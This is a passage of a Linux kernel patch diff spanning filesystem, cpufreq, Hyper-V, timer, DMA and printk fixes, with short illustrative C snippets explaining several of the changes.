+index 4183819ea0829..84f26f281fe9f 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -842,7 +842,7 @@ DECLARE_EVENT_CLASS(nfsd_clid_class,
+ 		__array(unsigned char, addr, sizeof(struct sockaddr_in6))
+ 		__field(unsigned long, flavor)
+ 		__array(unsigned char, verifier, NFS4_VERIFIER_SIZE)
+-		__string_len(name, name, clp->cl_name.len)
++		__string_len(name, clp->cl_name.data, clp->cl_name.len)
+ 	),
+ 	TP_fast_assign(
+ 		__entry->cl_boot = clp->cl_clientid.cl_boot;
+diff --git a/fs/nilfs2/btree.c b/fs/nilfs2/btree.c
+index 40ce92a332fe7..146640f0607a3 100644
+--- a/fs/nilfs2/btree.c
++++ b/fs/nilfs2/btree.c
+@@ -724,7 +724,7 @@ static int nilfs_btree_lookup_contig(const struct nilfs_bmap *btree,
+ 		dat = nilfs_bmap_get_dat(btree);
+ 		ret = nilfs_dat_translate(dat, ptr, &blocknr);
+ 		if (ret < 0)
+-			goto out;
++			goto dat_error;
+ 		ptr = blocknr;
+ 	}
+ 	cnt = 1;
+@@ -743,7 +743,7 @@ static int nilfs_btree_lookup_contig(const struct nilfs_bmap *btree,
+ 			if (dat) {
+ 				ret = nilfs_dat_translate(dat, ptr2, &blocknr);
+ 				if (ret < 0)
+-					goto out;
++					goto dat_error;
+ 				ptr2 = blocknr;
+ 			}
+ 			if (ptr2 != ptr + cnt || ++cnt == maxblocks)
+@@ -781,6 +781,11 @@ static int nilfs_btree_lookup_contig(const struct nilfs_bmap *btree,
+  out:
+ 	nilfs_btree_free_path(path);
+ 	return ret;
++
++ dat_error:
++	if (ret == -ENOENT)
++		ret = -EINVAL;  /* Notify bmap layer of metadata corruption */
++	goto out;
+ }
+ 
+ static void nilfs_btree_promote_key(struct nilfs_bmap *btree,
+diff --git a/fs/nilfs2/direct.c b/fs/nilfs2/direct.c
+index a35f2795b2422..8f802f7b0840b 100644
+--- a/fs/nilfs2/direct.c
++++ b/fs/nilfs2/direct.c
+@@ -66,7 +66,7 @@ static int nilfs_direct_lookup_contig(const struct nilfs_bmap *direct,
+ 		dat = nilfs_bmap_get_dat(direct);
+ 		ret = nilfs_dat_translate(dat, ptr, &blocknr);
+ 		if (ret < 0)
+-			return ret;
++			goto dat_error;
+ 		ptr = blocknr;
+ 	}
+ 
+@@ -79,7 +79,7 @@ static int nilfs_direct_lookup_contig(const struct nilfs_bmap *direct,
+ 		if (dat) {
+ 			ret = nilfs_dat_translate(dat, ptr2, &blocknr);
+ 			if (ret < 0)
+-				return ret;
++				goto dat_error;
+ 			ptr2 = blocknr;
+ 		}
+ 		if (ptr2 != ptr + cnt)
+@@ -87,6 +87,11 @@ static int nilfs_direct_lookup_contig(const struct nilfs_bmap *direct,
+ 	}
+ 	*ptrp = ptr;
+ 	return cnt;
++
++ dat_error:
++	if (ret == -ENOENT)
++		ret = -EINVAL;  /* Notify bmap layer of metadata corruption */
++	return ret;
+ }
+ 
+ static __u64
+diff --git a/fs/nilfs2/inode.c b/fs/nilfs2/inode.c
+index f625872321cca..8eb4288d46fe0 100644
+--- a/fs/nilfs2/inode.c
++++ b/fs/nilfs2/inode.c
+@@ -112,7 +112,7 @@ int nilfs_get_block(struct inode *inode, sector_t blkoff,
+ 					   "%s (ino=%lu): a race condition while inserting a data block at offset=%llu",
+ 					   __func__, inode->i_ino,
+ 					   (unsigned long long)blkoff);
+-				err = 0;
++				err = -EAGAIN;
+ 			}
+ 			nilfs_transaction_abort(inode->i_sb);
+ 			goto out;
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index fd082151c5f9b..86fe433b1d324 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -218,7 +218,8 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		.tcon = tcon,
+ 		.path = path,
+ 		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
+-		.desired_access =  FILE_READ_DATA | FILE_READ_ATTRIBUTES,
++		.desired_access =  FILE_READ_DATA | FILE_READ_ATTRIBUTES |
++				   FILE_READ_EA,
+ 		.disposition = FILE_OPEN,
+ 		.fid = pfid,
+ 	};
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 66d25d0e34d8b..39fc078284c8e 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -5757,15 +5757,21 @@ static int set_file_allocation_info(struct ksmbd_work *work,
+ 
+ 	loff_t alloc_blks;
+ 	struct inode *inode;
++	struct kstat stat;
+ 	int rc;
+ 
+ 	if (!(fp->daccess & FILE_WRITE_DATA_LE))
+ 		return -EACCES;
+ 
++	rc = vfs_getattr(&fp->filp->f_path, &stat, STATX_BASIC_STATS,
++			 AT_STATX_SYNC_AS_STAT);
++	if (rc)
++		return rc;
++
+ 	alloc_blks = (le64_to_cpu(file_alloc_info->AllocationSize) + 511) >> 9;
+ 	inode = file_inode(fp->filp);
+ 
+-	if (alloc_blks > inode->i_blocks) {
++	if (alloc_blks > stat.blocks) {
+ 		smb_break_all_levII_oplock(work, fp, 1);
+ 		rc = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
+ 				   alloc_blks * 512);
+@@ -5773,7 +5779,7 @@ static int set_file_allocation_info(struct ksmbd_work *work,
+ 			pr_err("vfs_fallocate is failed : %d\n", rc);
+ 			return rc;
+ 		}
+-	} else if (alloc_blks < inode->i_blocks) {
++	} else if (alloc_blks < stat.blocks) {
+ 		loff_t size;
+ 
+ 		/*
+diff --git a/fs/ubifs/file.c b/fs/ubifs/file.c
+index 10c1779af9c51..f7b1f9ece1364 100644
+--- a/fs/ubifs/file.c
++++ b/fs/ubifs/file.c
+@@ -261,9 +261,6 @@ static int write_begin_slow(struct address_space *mapping,
+ 				return err;
+ 			}
+ 		}
+-
+-		SetPageUptodate(page);
+-		ClearPageError(page);
+ 	}
+ 
+ 	if (PagePrivate(page))
+@@ -462,9 +459,6 @@ static int ubifs_write_begin(struct file *file, struct address_space *mapping,
+ 				return err;
+ 			}
+ 		}
+-
+-		SetPageUptodate(page);
+-		ClearPageError(page);
+ 	}
+ 
+ 	err = allocate_budget(c, page, ui, appending);
+@@ -474,10 +468,8 @@ static int ubifs_write_begin(struct file *file, struct address_space *mapping,
+ 		 * If we skipped reading the page because we were going to
+ 		 * write all of it, then it is not up to date.
+ 		 */
+-		if (skipped_read) {
++		if (skipped_read)
+ 			ClearPageChecked(page);
+-			ClearPageUptodate(page);
+-		}
+ 		/*
+ 		 * Budgeting failed which means it would have to force
+ 		 * write-back but didn't, because we set the @fast flag in the
+@@ -568,6 +560,9 @@ static int ubifs_write_end(struct file *file, struct address_space *mapping,
+ 		goto out;
+ 	}
+ 
++	if (len == PAGE_SIZE)
++		SetPageUptodate(page);
++
+ 	if (!PagePrivate(page)) {
+ 		attach_page_private(page, (void *)1);
+ 		atomic_long_inc(&c->dirty_pg_cnt);
+diff --git a/include/drm/drm_modeset_helper_vtables.h b/include/drm/drm_modeset_helper_vtables.h
+index fafa70ac1337f..6f19cf5c210e5 100644
+--- a/include/drm/drm_modeset_helper_vtables.h
++++ b/include/drm/drm_modeset_helper_vtables.h
+@@ -896,7 +896,8 @@ struct drm_connector_helper_funcs {
+ 	 *
+ 	 * RETURNS:
+ 	 *
+-	 * The number of modes added by calling drm_mode_probed_add().
++	 * The number of modes added by calling drm_mode_probed_add(). Return 0
++	 * on failures (no modes) instead of negative error codes.
+ 	 */
+ 	int (*get_modes)(struct drm_connector *connector);
+ 
+diff --git a/include/linux/cpufreq.h b/include/linux/cpufreq.h
+index d5595d57f4e53..9d208648c84d5 100644
+--- a/include/linux/cpufreq.h
++++ b/include/linux/cpufreq.h
+@@ -1023,6 +1023,18 @@ static inline int cpufreq_table_find_index_c(struct cpufreq_policy *policy,
+ 						   efficiencies);
+ }
+ 
++static inline bool cpufreq_is_in_limits(struct cpufreq_policy *policy, int idx)
++{
++	unsigned int freq;
++
++	if (idx < 0)
++		return false;
++
++	freq = policy->freq_table[idx].frequency;
++
++	return freq == clamp_val(freq, policy->min, policy->max);
++}
++
+ static inline int cpufreq_frequency_table_target(struct cpufreq_policy *policy,
+ 						 unsigned int target_freq,
+ 						 unsigned int relation)
+@@ -1056,7 +1068,8 @@ static inline int cpufreq_frequency_table_target(struct cpufreq_policy *policy,
+ 		return 0;
+ 	}
+ 
+-	if (idx < 0 && efficiencies) {
++	/* Limit frequency index to honor policy->min/max */
++	if (!cpufreq_is_in_limits(policy, idx) && efficiencies) {
+ 		efficiencies = false;
+ 		goto retry;
+ 	}
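
cpufreq_is_in_limits() relies on a clamp identity: a value lies in [min, max] exactly when clamping leaves it unchanged. A standalone sketch; clamp_val() is a simplified stand-in for the kernel macro, which additionally enforces type consistency:

#include <stdio.h>

#define clamp_val(v, lo, hi) ((v) < (lo) ? (lo) : ((v) > (hi) ? (hi) : (v)))

static int is_in_limits(unsigned int freq, unsigned int min, unsigned int max)
{
	/* unchanged by clamping iff min <= freq <= max */
	return freq == clamp_val(freq, min, max);
}

int main(void)
{
	printf("%d %d %d\n",
	       is_in_limits(800000, 400000, 1200000),	/* 1 */
	       is_in_limits(200000, 400000, 1200000),	/* 0 */
	       is_in_limits(1400000, 400000, 1200000));	/* 0 */
	return 0;
}
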
+diff --git a/include/linux/gfp.h b/include/linux/gfp.h
+index 65a78773dccad..e2ccb47c42643 100644
+--- a/include/linux/gfp.h
++++ b/include/linux/gfp.h
+@@ -341,6 +341,15 @@ bool gfp_pfmemalloc_allowed(gfp_t gfp_mask);
+ extern void pm_restrict_gfp_mask(void);
+ extern void pm_restore_gfp_mask(void);
+ 
++/*
++ * Check if the gfp flags allow compaction - GFP_NOIO is a really
++ * tricky context because the migration might require IO.
++ */
++static inline bool gfp_compaction_allowed(gfp_t gfp_mask)
++{
++	return IS_ENABLED(CONFIG_COMPACTION) && (gfp_mask & __GFP_IO);
++}
++
+ extern gfp_t vma_thp_gfp_mask(struct vm_area_struct *vma);
+ 
+ #ifdef CONFIG_PM_SLEEP
+diff --git a/include/linux/hyperv.h b/include/linux/hyperv.h
+index 646f1da9f27e0..4fbd5d8417111 100644
+--- a/include/linux/hyperv.h
++++ b/include/linux/hyperv.h
+@@ -164,8 +164,28 @@ struct hv_ring_buffer {
+ 	u8 buffer[];
+ } __packed;
+ 
++
++/*
++ * If the requested ring buffer size is at least 8 times the size of the
++ * header, steal space from the ring buffer for the header. Otherwise, add
++ * space for the header so that it doesn't take too much of the ring buffer
++ * space.
++ *
++ * The factor of 8 is somewhat arbitrary. The goal is to prevent adding a
++ * relatively small header (4 Kbytes on x86) to a large-ish power-of-2 ring
++ * buffer size (such as 128 Kbytes) and so end up making a nearly twice as
++ * large allocation that will be almost half wasted. As a contrasting example,
++ * on ARM64 with 64 Kbyte page size, we don't want to take 64 Kbytes for the
++ * header from a 128 Kbyte allocation, leaving only 64 Kbytes for the ring.
++ * In this latter case, we must add 64 Kbytes for the header and not worry
++ * about what's wasted.
++ */
++#define VMBUS_HEADER_ADJ(payload_sz) \
++	((payload_sz) >=  8 * sizeof(struct hv_ring_buffer) ? \
++	0 : sizeof(struct hv_ring_buffer))
++
+ /* Calculate the proper size of a ringbuffer, it must be page-aligned */
+-#define VMBUS_RING_SIZE(payload_sz) PAGE_ALIGN(sizeof(struct hv_ring_buffer) + \
++#define VMBUS_RING_SIZE(payload_sz) PAGE_ALIGN(VMBUS_HEADER_ADJ(payload_sz) + \
+ 					       (payload_sz))
+ 
+ struct hv_ring_buffer_info {
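
Plugging numbers into the new macros makes the trade-off in the comment concrete. Assuming a 4 KiB page and a 4 KiB struct hv_ring_buffer (the x86 values the comment cites), a compilable sketch:

#include <stdio.h>

#define PAGE_SIZE	4096UL
#define PAGE_ALIGN(x)	(((x) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))
#define HDR		4096UL	/* assumed sizeof(struct hv_ring_buffer) */

#define VMBUS_HEADER_ADJ(payload_sz) \
	((payload_sz) >= 8 * HDR ? 0 : HDR)
#define VMBUS_RING_SIZE(payload_sz) \
	PAGE_ALIGN(VMBUS_HEADER_ADJ(payload_sz) + (payload_sz))

int main(void)
{
	/* large ring: header stolen from the payload, allocation stays 128K */
	printf("%lu\n", VMBUS_RING_SIZE(128 * 1024UL));	/* 131072 */
	/* small ring: header added so it doesn't eat half the payload */
	printf("%lu\n", VMBUS_RING_SIZE(16 * 1024UL));	/* 20480 */
	return 0;
}
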
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index 45910aebc3778..6645259be1438 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -102,6 +102,7 @@ enum {
+ 	ATA_DFLAG_NCQ_SEND_RECV = (1 << 19), /* device supports NCQ SEND and RECV */
+ 	ATA_DFLAG_NCQ_PRIO	= (1 << 20), /* device supports NCQ priority */
+ 	ATA_DFLAG_NCQ_PRIO_ENABLED = (1 << 21), /* Priority cmds sent to dev */
++	ATA_DFLAG_RESUMING	= (1 << 22),  /* Device is resuming */
+ 	ATA_DFLAG_INIT_MASK	= (1 << 24) - 1,
+ 
+ 	ATA_DFLAG_DETACH	= (1 << 24),
+diff --git a/include/linux/minmax.h b/include/linux/minmax.h
+index 5433c08fcc685..1aea34b8f19bf 100644
+--- a/include/linux/minmax.h
++++ b/include/linux/minmax.h
+@@ -51,6 +51,23 @@
+  */
+ #define max(x, y)	__careful_cmp(x, y, >)
+ 
++/**
++ * umin - return minimum of two non-negative values
++ *   Signed types are zero extended to match a larger unsigned type.
++ * @x: first value
++ * @y: second value
++ */
++#define umin(x, y)	\
++	__careful_cmp((x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull, <)
++
++/**
++ * umax - return maximum of two non-negative values
++ * @x: first value
++ * @y: second value
++ */
++#define umax(x, y)	\
++	__careful_cmp((x) + 0u + 0ul + 0ull, (y) + 0u + 0ul + 0ull, >)
++
+ /**
+  * min3 - return minimum of three values
+  * @x: first value
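
The restriction of umin()/umax() to non-negative values follows from the promotion chain: adding 0u + 0ul + 0ull converts both operands to the widest unsigned type in play, so a negative signed argument wraps before the comparison. A standalone demonstration; this umin() is a simplified, double-evaluating stand-in for the kernel's __careful_cmp() version:

#include <stdio.h>

#define umin(x, y) \
	((x) + 0u + 0ul + 0ull < (y) + 0u + 0ul + 0ull ? (x) : (y))

int main(void)
{
	unsigned long long big = 5000000000ULL;
	unsigned int small = 7;

	/* mixed widths compare correctly once zero extended */
	printf("%llu\n", (unsigned long long)umin(big, small));	/* 7 */

	/* pitfall: -1 wraps to a huge value, so umin(-1, 7) is 7, not -1 */
	printf("%llu\n", (unsigned long long)umin(-1, small));	/* 7 */
	return 0;
}
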
+diff --git a/include/linux/nfs_fs.h b/include/linux/nfs_fs.h
+index 7931fa4725612..ac7d799d9d387 100644
+--- a/include/linux/nfs_fs.h
++++ b/include/linux/nfs_fs.h
+@@ -582,6 +582,7 @@ int nfs_wb_folio_cancel(struct inode *inode, struct folio *folio);
+ extern int  nfs_commit_inode(struct inode *, int);
+ extern struct nfs_commit_data *nfs_commitdata_alloc(void);
+ extern void nfs_commit_free(struct nfs_commit_data *data);
++void nfs_commit_begin(struct nfs_mds_commit_info *cinfo);
+ bool nfs_commit_end(struct nfs_mds_commit_info *cinfo);
+ 
+ static inline bool nfs_have_writebacks(const struct inode *inode)
+diff --git a/include/linux/phy/tegra/xusb.h b/include/linux/phy/tegra/xusb.h
+index 70998e6dd6fdc..6ca51e0080ec0 100644
+--- a/include/linux/phy/tegra/xusb.h
++++ b/include/linux/phy/tegra/xusb.h
+@@ -26,6 +26,7 @@ void tegra_phy_xusb_utmi_pad_power_down(struct phy *phy);
+ int tegra_phy_xusb_utmi_port_reset(struct phy *phy);
+ int tegra_xusb_padctl_get_usb3_companion(struct tegra_xusb_padctl *padctl,
+ 					 unsigned int port);
++int tegra_xusb_padctl_get_port_number(struct phy *phy);
+ int tegra_xusb_padctl_enable_phy_sleepwalk(struct tegra_xusb_padctl *padctl, struct phy *phy,
+ 					   enum usb_device_speed speed);
+ int tegra_xusb_padctl_disable_phy_sleepwalk(struct tegra_xusb_padctl *padctl, struct phy *phy);
+diff --git a/include/linux/ring_buffer.h b/include/linux/ring_buffer.h
+index 3c7d295746f67..3e7bfc0f65aee 100644
+--- a/include/linux/ring_buffer.h
++++ b/include/linux/ring_buffer.h
+@@ -98,6 +98,7 @@ __ring_buffer_alloc(unsigned long size, unsigned flags, struct lock_class_key *k
+ 	__ring_buffer_alloc((size), (flags), &__key);	\
+ })
+ 
++typedef bool (*ring_buffer_cond_fn)(void *data);
+ int ring_buffer_wait(struct trace_buffer *buffer, int cpu, int full);
+ __poll_t ring_buffer_poll_wait(struct trace_buffer *buffer, int cpu,
+ 			  struct file *filp, poll_table *poll_table, int full);
+diff --git a/include/linux/timer.h b/include/linux/timer.h
+index 648f00105f588..6d18f04ad7039 100644
+--- a/include/linux/timer.h
++++ b/include/linux/timer.h
+@@ -183,12 +183,20 @@ extern int timer_reduce(struct timer_list *timer, unsigned long expires);
+ extern void add_timer(struct timer_list *timer);
+ 
+ extern int try_to_del_timer_sync(struct timer_list *timer);
++extern int timer_delete_sync(struct timer_list *timer);
+ 
+-#if defined(CONFIG_SMP) || defined(CONFIG_PREEMPT_RT)
+-  extern int del_timer_sync(struct timer_list *timer);
+-#else
+-# define del_timer_sync(t)		del_timer(t)
+-#endif
++/**
++ * del_timer_sync - Delete a pending timer and wait for a running callback
++ * @timer:	The timer to be deleted
++ *
++ * See timer_delete_sync() for detailed explanation.
++ *
++ * Do not use in new code. Use timer_delete_sync() instead.
++ */
++static inline int del_timer_sync(struct timer_list *timer)
++{
++	return timer_delete_sync(timer);
++}
+ 
+ #define del_singleshot_timer_sync(t) del_timer_sync(t)
+ 
+diff --git a/include/linux/vfio.h b/include/linux/vfio.h
+index fdd393f70b198..5e7bf143cb223 100644
+--- a/include/linux/vfio.h
++++ b/include/linux/vfio.h
+@@ -268,6 +268,7 @@ struct virqfd {
+ 	wait_queue_entry_t		wait;
+ 	poll_table		pt;
+ 	struct work_struct	shutdown;
++	struct work_struct	flush_inject;
+ 	struct virqfd		**pvirqfd;
+ };
+ 
+@@ -275,5 +276,6 @@ int vfio_virqfd_enable(void *opaque, int (*handler)(void *, void *),
+ 		       void (*thread)(void *, void *), void *data,
+ 		       struct virqfd **pvirqfd, int fd);
+ void vfio_virqfd_disable(struct virqfd **pvirqfd);
++void vfio_virqfd_flush_thread(struct virqfd **pvirqfd);
+ 
+ #endif /* VFIO_H */
+diff --git a/include/media/media-entity.h b/include/media/media-entity.h
+index 28c9de8a1f348..03bb0963942bd 100644
+--- a/include/media/media-entity.h
++++ b/include/media/media-entity.h
+@@ -205,6 +205,7 @@ enum media_pad_signal_type {
+  * @graph_obj:	Embedded structure containing the media object common data
+  * @entity:	Entity this pad belongs to
+  * @index:	Pad index in the entity pads array, numbered from 0 to n
++ * @num_links:	Number of links connected to this pad
+  * @sig_type:	Type of the signal inside a media pad
+  * @flags:	Pad flags, as defined in
+  *		:ref:`include/uapi/linux/media.h <media_header>`
+@@ -216,6 +217,7 @@ struct media_pad {
+ 	struct media_gobj graph_obj;	/* must be first field in struct */
+ 	struct media_entity *entity;
+ 	u16 index;
++	u16 num_links;
+ 	enum media_pad_signal_type sig_type;
+ 	unsigned long flags;
+ 
+diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h
+index d8d8719315fd8..5f7f28c9edcb6 100644
+--- a/include/net/cfg802154.h
++++ b/include/net/cfg802154.h
+@@ -267,6 +267,7 @@ struct ieee802154_llsec_key {
+ 
+ struct ieee802154_llsec_key_entry {
+ 	struct list_head list;
++	struct rcu_head rcu;
+ 
+ 	struct ieee802154_llsec_key_id id;
+ 	struct ieee802154_llsec_key *key;
+diff --git a/include/scsi/scsi_driver.h b/include/scsi/scsi_driver.h
+index 4ce1988b2ba01..f40915d2eceef 100644
+--- a/include/scsi/scsi_driver.h
++++ b/include/scsi/scsi_driver.h
+@@ -12,6 +12,7 @@ struct request;
+ struct scsi_driver {
+ 	struct device_driver	gendrv;
+ 
++	int (*resume)(struct device *);
+ 	void (*rescan)(struct device *);
+ 	blk_status_t (*init_command)(struct scsi_cmnd *);
+ 	void (*uninit_command)(struct scsi_cmnd *);
+diff --git a/include/scsi/scsi_host.h b/include/scsi/scsi_host.h
+index 71def41b1ad78..149b63e3534ad 100644
+--- a/include/scsi/scsi_host.h
++++ b/include/scsi/scsi_host.h
+@@ -752,6 +752,7 @@ extern int __must_check scsi_add_host_with_dma(struct Scsi_Host *,
+ 					       struct device *,
+ 					       struct device *);
+ extern void scsi_scan_host(struct Scsi_Host *);
++extern int scsi_resume_device(struct scsi_device *sdev);
+ extern int scsi_rescan_device(struct scsi_device *sdev);
+ extern void scsi_remove_host(struct Scsi_Host *);
+ extern struct Scsi_Host *scsi_host_get(struct Scsi_Host *);
+diff --git a/init/Kconfig b/init/Kconfig
+index ffb927bf6034f..b63dce6706c5c 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -902,14 +902,14 @@ config CC_IMPLICIT_FALLTHROUGH
+ 	default "-Wimplicit-fallthrough=5" if CC_IS_GCC && $(cc-option,-Wimplicit-fallthrough=5)
+ 	default "-Wimplicit-fallthrough" if CC_IS_CLANG && $(cc-option,-Wunreachable-code-fallthrough)
+ 
+-# Currently, disable gcc-11+ array-bounds globally.
++# Currently, disable gcc-10+ array-bounds globally.
+ # It's still broken in gcc-13, so no upper bound yet.
+-config GCC11_NO_ARRAY_BOUNDS
++config GCC10_NO_ARRAY_BOUNDS
+ 	def_bool y
+ 
+ config CC_NO_ARRAY_BOUNDS
+ 	bool
+-	default y if CC_IS_GCC && GCC_VERSION >= 110000 && GCC11_NO_ARRAY_BOUNDS
++	default y if CC_IS_GCC && GCC_VERSION >= 100000 && GCC10_NO_ARRAY_BOUNDS
+ 
+ #
+ # For architectures that know their GCC __int128 support is sound
+diff --git a/init/initramfs.c b/init/initramfs.c
+index 2f5bfb7d76521..7b915170789da 100644
+--- a/init/initramfs.c
++++ b/init/initramfs.c
+@@ -680,7 +680,7 @@ static void __init populate_initrd_image(char *err)
+ 
+ 	printk(KERN_INFO "rootfs image is not initramfs (%s); looks like an initrd\n",
+ 			err);
+-	file = filp_open("/initrd.image", O_WRONLY | O_CREAT, 0700);
++	file = filp_open("/initrd.image", O_WRONLY|O_CREAT|O_LARGEFILE, 0700);
+ 	if (IS_ERR(file))
+ 		return;
+ 
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 0d4ee3d738fbf..b1b564c04d1e7 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -876,7 +876,8 @@ int io_recvmsg(struct io_kiocb *req, unsigned int issue_flags)
+ 			kfree(kmsg->free_iov);
+ 		io_netmsg_recycle(req, issue_flags);
+ 		req->flags &= ~REQ_F_NEED_CLEANUP;
+-	}
++	} else if (ret == -EAGAIN)
++		return io_setup_async_msg(req, kmsg, issue_flags);
+ 
+ 	return ret;
+ }
+diff --git a/kernel/bounds.c b/kernel/bounds.c
+index b529182e8b04f..c5a9fcd2d6228 100644
+--- a/kernel/bounds.c
++++ b/kernel/bounds.c
+@@ -19,7 +19,7 @@ int main(void)
+ 	DEFINE(NR_PAGEFLAGS, __NR_PAGEFLAGS);
+ 	DEFINE(MAX_NR_ZONES, __MAX_NR_ZONES);
+ #ifdef CONFIG_SMP
+-	DEFINE(NR_CPUS_BITS, ilog2(CONFIG_NR_CPUS));
++	DEFINE(NR_CPUS_BITS, bits_per(CONFIG_NR_CPUS));
+ #endif
+ 	DEFINE(SPINLOCK_SIZE, sizeof(spinlock_t));
+ #ifdef CONFIG_LRU_GEN
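
The bounds.c change matters once CONFIG_NR_CPUS is not a power of two: ilog2() rounds down, so with e.g. NR_CPUS = 6 a field sized that way gets 2 bits and can only encode ids 0-3, while bits_per(6) = 3 covers ids up to 5 (at the cost of a spare bit when NR_CPUS is a power of two). A quick check with simplified stand-ins for the two helpers:

#include <stdio.h>

static int ilog2_u(unsigned int n)	/* floor(log2(n)) */
{
	int bits = -1;

	while (n) {
		n >>= 1;
		bits++;
	}
	return bits;
}

static int bits_per(unsigned int n)	/* bits needed to represent n */
{
	return ilog2_u(n) + 1;
}

int main(void)
{
	/* NR_CPUS = 6: ilog2 sizes the field for 0..3, bits_per for 0..7 */
	printf("ilog2(6)=%d bits_per(6)=%d\n", ilog2_u(6), bits_per(6));
	return 0;
}
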
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index ad6333c3fe1ff..db89ac94e7db4 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -654,8 +654,7 @@ static int swiotlb_do_find_slots(struct device *dev, int area_index,
+ 	dma_addr_t tbl_dma_addr =
+ 		phys_to_dma_unencrypted(dev, mem->start) & boundary_mask;
+ 	unsigned long max_slots = get_max_slots(boundary_mask);
+-	unsigned int iotlb_align_mask =
+-		dma_get_min_align_mask(dev) & ~(IO_TLB_SIZE - 1);
++	unsigned int iotlb_align_mask = dma_get_min_align_mask(dev);
+ 	unsigned int nslots = nr_slots(alloc_size), stride;
+ 	unsigned int index, wrap, count = 0, i;
+ 	unsigned int offset = swiotlb_align_offset(dev, orig_addr);
+@@ -666,6 +665,14 @@ static int swiotlb_do_find_slots(struct device *dev, int area_index,
+ 	BUG_ON(!nslots);
+ 	BUG_ON(area_index >= mem->nareas);
+ 
++	/*
++	 * Ensure that the allocation is at least slot-aligned and update
++	 * 'iotlb_align_mask' to ignore bits that will be preserved when
++	 * offsetting into the allocation.
++	 */
++	alloc_align_mask |= (IO_TLB_SIZE - 1);
++	iotlb_align_mask &= ~alloc_align_mask;
++
+ 	/*
+ 	 * For mappings with an alignment requirement don't bother looping to
+ 	 * unaligned slots once we found an aligned one.  For allocations of
+diff --git a/kernel/entry/common.c b/kernel/entry/common.c
+index be61332c66b54..ccf2b1e1b40be 100644
+--- a/kernel/entry/common.c
++++ b/kernel/entry/common.c
+@@ -77,8 +77,14 @@ static long syscall_trace_enter(struct pt_regs *regs, long syscall,
+ 	/* Either of the above might have changed the syscall number */
+ 	syscall = syscall_get_nr(current, regs);
+ 
+-	if (unlikely(work & SYSCALL_WORK_SYSCALL_TRACEPOINT))
++	if (unlikely(work & SYSCALL_WORK_SYSCALL_TRACEPOINT)) {
+ 		trace_sys_enter(regs, syscall);
++		/*
++		 * Probes or BPF hooks in the tracepoint may have changed the
++		 * system call number as well.
++		 */
++		syscall = syscall_get_nr(current, regs);
++	}
+ 
+ 	syscall_enter_audit(regs, syscall);
+ 
+diff --git a/kernel/power/suspend.c b/kernel/power/suspend.c
+index fa3bf161d13f7..a718067deecee 100644
+--- a/kernel/power/suspend.c
++++ b/kernel/power/suspend.c
+@@ -192,6 +192,7 @@ static int __init mem_sleep_default_setup(char *str)
+ 		if (mem_sleep_labels[state] &&
+ 		    !strcmp(str, mem_sleep_labels[state])) {
+ 			mem_sleep_default = state;
++			mem_sleep_current = state;
+ 			break;
+ 		}
+ 
+diff --git a/kernel/printk/printk.c b/kernel/printk/printk.c
+index 981cdb00b8722..0ae06d5046bb0 100644
+--- a/kernel/printk/printk.c
++++ b/kernel/printk/printk.c
+@@ -1947,6 +1947,12 @@ static int console_trylock_spinning(void)
+ 	 */
+ 	mutex_acquire(&console_lock_dep_map, 0, 1, _THIS_IP_);
+ 
++	/*
++	 * Update @console_may_schedule for trylock because the previous
++	 * owner may have been schedulable.
++	 */
++	console_may_schedule = 0;
++
+ 	return 1;
+ }
+ 
+@@ -3045,6 +3051,21 @@ static int __init keep_bootcon_setup(char *str)
+ 
+ early_param("keep_bootcon", keep_bootcon_setup);
+ 
++static int console_call_setup(struct console *newcon, char *options)
++{
++	int err;
++
++	if (!newcon->setup)
++		return 0;
++
++	/* Synchronize with possible boot console. */
++	console_lock();
++	err = newcon->setup(newcon, options);
++	console_unlock();
++
++	return err;
++}
++
+ /*
+  * This is called by register_console() to try to match
+  * the newly registered console with any of the ones selected
+@@ -3080,8 +3101,8 @@ static int try_enable_preferred_console(struct console *newcon,
+ 			if (_braille_register_console(newcon, c))
+ 				return 0;
+ 
+-			if (newcon->setup &&
+-			    (err = newcon->setup(newcon, c->options)) != 0)
++			err = console_call_setup(newcon, c->options);
++			if (err)
+ 				return err;
+ 		}
+ 		newcon->flags |= CON_ENABLED;
+@@ -3107,7 +3128,7 @@ static void try_enable_default_console(struct console *newcon)
+ 	if (newcon->index < 0)
+ 		newcon->index = 0;
+ 
+-	if (newcon->setup && newcon->setup(newcon, NULL) != 0)
++	if (console_call_setup(newcon, NULL) != 0)
+ 		return;
+ 
+ 	newcon->flags |= CON_ENABLED;
+diff --git a/kernel/time/timer.c b/kernel/time/timer.c
+index 717fcb9fb14aa..59469897432bc 100644
+--- a/kernel/time/timer.c
++++ b/kernel/time/timer.c
+@@ -1083,7 +1083,7 @@ __mod_timer(struct timer_list *timer, unsigned long expires, unsigned int option
+ 		/*
+ 		 * We are trying to schedule the timer on the new base.
+ 		 * However we can't change timer's base while it is running,
+-		 * otherwise del_timer_sync() can't detect that the timer's
++		 * otherwise timer_delete_sync() can't detect that the timer's
+ 		 * handler yet has not finished. This also guarantees that the
+ 		 * timer is serialized wrt itself.
+ 		 */
+@@ -1121,14 +1121,16 @@ __mod_timer(struct timer_list *timer, unsigned long expires, unsigned int option
+ }
+ 
+ /**
+- * mod_timer_pending - modify a pending timer's timeout
+- * @timer: the pending timer to be modified
+- * @expires: new timeout in jiffies
++ * mod_timer_pending - Modify a pending timer's timeout
++ * @timer:	The pending timer to be modified
++ * @expires:	New absolute timeout in jiffies
